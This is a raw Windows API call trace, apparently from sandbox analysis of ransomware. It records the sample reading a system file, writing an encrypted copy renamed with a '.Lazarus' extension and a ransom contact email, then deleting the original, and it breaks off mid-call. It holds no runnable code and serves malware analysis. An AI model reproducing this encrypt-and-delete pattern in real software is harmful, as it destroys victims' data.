RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.199] AreFileApisANSI () returned 1 [0060.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x719c8 [0060.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=45 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 45 [0060.199] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c)) returned 1 [0060.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0060.199] AreFileApisANSI () returned 1 [0060.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0060.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.200] GetLastError () returned 0x0 [0060.200] SetLastError (dwErrCode=0x0) [0060.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e110 [0060.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0060.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x30fc0 [0060.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0060.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0060.200] GetLastError () returned 0x0 [0060.200] SetLastError (dwErrCode=0x0) [0060.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0060.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71a98 [0060.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0060.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0060.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0060.200] AreFileApisANSI () returned 1 [0060.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0060.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x31cd0 [0060.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x31cd0, cchWideChar=107 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0060.200] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.201] GetFileType (hFile=0x424) returned 0x1 [0060.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x31cd0 | out: hHeap=0x20000) returned 1 [0060.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0060.201] AreFileApisANSI () returned 1 [0060.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b68 [0060.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=45 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 45 [0060.201] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.201] GetFileType (hFile=0x41c) returned 0x1 [0060.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0060.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0060.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.202] GetLastError () returned 0x0 [0060.202] SetLastError (dwErrCode=0x0) [0060.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.202] GetLastError () returned 0x0 [0060.202] SetLastError (dwErrCode=0x0) [0060.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8a210 [0060.202] ReadFile (in: hFile=0x41c, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f030*=0x9c, lpOverlapped=0x0) returned 1 [0060.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0060.204] ReadFile (in: hFile=0x41c, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0060.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0060.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8b218 [0060.204] GetLastError () returned 0x0 [0060.204] SetLastError (dwErrCode=0x0) [0060.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc) returned 0x7d6c0 [0060.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0060.204] GetLastError () returned 0x0 [0060.204] SetLastError (dwErrCode=0x0) [0060.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0060.204] WriteFile (in: hFile=0x424, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327ef70*=0xa0, lpOverlapped=0x0) returned 1 [0060.206] GetLastError () returned 0x0 [0060.206] SetLastError (dwErrCode=0x0) [0060.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0060.206] GetLastError () returned 0x0 [0060.206] SetLastError (dwErrCode=0x0) [0060.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0060.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0060.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0060.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0060.206] CloseHandle (hObject=0x424) returned 1 [0060.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0060.207] CloseHandle (hObject=0x41c) returned 1 [0060.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0060.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0060.207] AreFileApisANSI () returned 1 [0060.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0060.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 45 [0060.207] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.208] GetFileType (hFile=0x41c) returned 0x1 [0060.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0060.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8a210 [0060.209] GetLastError () returned 0xb7 [0060.209] SetLastError (dwErrCode=0xb7) [0060.209] WriteFile (in: hFile=0x41c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0060.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0060.210] CloseHandle (hObject=0x41c) returned 1 [0060.210] AreFileApisANSI () returned 1 [0060.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0060.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 45 [0060.210] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini")) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0060.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.211] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x23, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0060.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0060.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0060.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0060.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0060.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0060.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0060.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0060.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0060.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0060.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0060.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0060.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0060.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0060.212] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.212] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.212] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.212] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0060.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0060.212] AreFileApisANSI () returned 1 [0060.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", lpUsedDefaultChar=0x0) returned 47 [0060.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.212] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.212] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0060.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0060.213] AreFileApisANSI () returned 1 [0060.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0060.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71620 [0060.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 47 [0060.213] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.214] GetFileType (hFile=0x41c) returned 0x1 [0060.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.214] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0060.214] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0060.214] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0060.215] CloseHandle (hObject=0x41c) returned 1 [0060.215] AreFileApisANSI () returned 1 [0060.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0060.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71bd0 [0060.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 47 [0060.215] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.215] GetFileType (hFile=0x41c) returned 0x1 [0060.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0060.215] CloseHandle (hObject=0x41c) returned 1 [0060.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0060.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0060.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0060.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0060.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0060.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0060.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0060.216] HeapFree (in: hHeap=0x20000, 